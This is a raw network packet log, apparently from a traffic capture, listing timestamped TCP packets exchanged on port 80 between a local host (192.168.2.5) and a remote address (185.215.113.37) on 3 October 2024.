Oct 3, 2024 21:36:13.499587059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499596119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.499603033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499614000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499622107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.499629021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499643087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499648094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.499656916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499663115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.499671936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499682903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499689102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.499697924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499708891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499716043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.499725103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.499732018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.499759912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.500130892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.500140905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.500150919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.500180960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.580151081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580178022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580188990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580198050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580208063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580215931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580226898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580311060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.580463886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580473900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580482960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580492020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.580501080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.580506086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580543041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.580562115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.580631971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580641031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580650091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580672979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.580697060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.580775976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580784082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580794096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580805063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.580825090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.580840111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581032991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581043005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581075907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581093073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581140995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581151009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581159115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581168890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581176996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581185102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581195116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581202030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581216097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581245899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581449986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581458092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581466913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581475973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581482887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581496954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581522942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581696987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581705093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581713915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581717968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581722975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581732035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581737995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581751108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581759930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581764936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581773043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581779957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581789970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.581804037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.581820011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.582415104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582425117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582434893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582444906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582470894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.582480907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582487106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582496881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.582503080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582509041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582551003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.582581043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.582881927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582891941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582901955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582911968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582918882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.582928896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582936049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.582945108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582958937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582966089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.582976103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.582992077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.583007097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.583515882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583525896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583535910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583544970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583554983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583564043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583569050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583575010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583583117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.583591938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583601952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583611965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583621979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.583626986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583638906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583647013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.583653927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583663940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.583671093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583681107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.583692074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.583719015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.584434032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584444046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584453106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584465981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584470987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.584480047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584491014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.584496021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584506035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584516048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584522963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.584531069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584538937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.584547997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584554911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.584563971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584573984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584582090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.584589958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584600925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584610939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.584618092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.584629059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.584652901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.585341930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585351944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585361004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585371971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.585376978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585387945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585397959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.585405111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585413933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585421085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.585429907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585441113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585449934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585459948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.585467100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585477114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585489035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585494995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.585506916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585511923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.585521936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.585530043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.585547924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.585577011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.586123943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.586133003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.586142063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.586152077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.586162090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.586169004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.586178064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.586188078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.586195946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.586210966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.586229086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.667201996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667220116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667224884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667231083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667236090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667241096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667247057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667330980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.667365074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.667522907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667532921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667541027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667551041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667561054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667571068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.667577028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667587042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667603016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.667620897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.667758942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667769909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667778015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667809010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.667819977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.667956114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667964935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.667973995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668001890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668020010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668160915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668169975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668179035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668188095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668196917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668204069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668211937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668221951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668229103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668236971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668253899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668272972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668489933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668539047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668672085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668680906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668689013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668698072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668705940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668713093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668720961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668730021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668739080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668745041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668752909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.668761015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668776989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.668806076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.669142008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.669151068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.669158936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.669167042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.669176102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.669184923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.669192076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.669210911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.669234037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.720032930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.725250006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942037106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942055941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942066908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942121983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942143917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942154884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942164898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942212105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942212105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942306042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942317009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942322969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942332983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942344904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942356110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942363977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942380905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942404985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942599058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942609072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942641973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942655087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942670107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942682028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942701101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942718983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942847013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942857981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942867994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942878008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942889929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.942895889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.942934990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943090916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943101883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943111897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943191051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943262100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943300009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943316936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943331003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943340063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943353891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943372965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943403959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943414927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943425894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943439960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943445921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943456888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943464041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943475962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943485975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943495989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943515062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943537951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943909883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943921089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943932056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943942070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943950891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943960905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943969011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.943978071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.943989038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944000006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944005966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944016933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944022894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944034100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944046021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944073915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944696903 CEST	80	49704	185.215.113.37	192.168.2.5
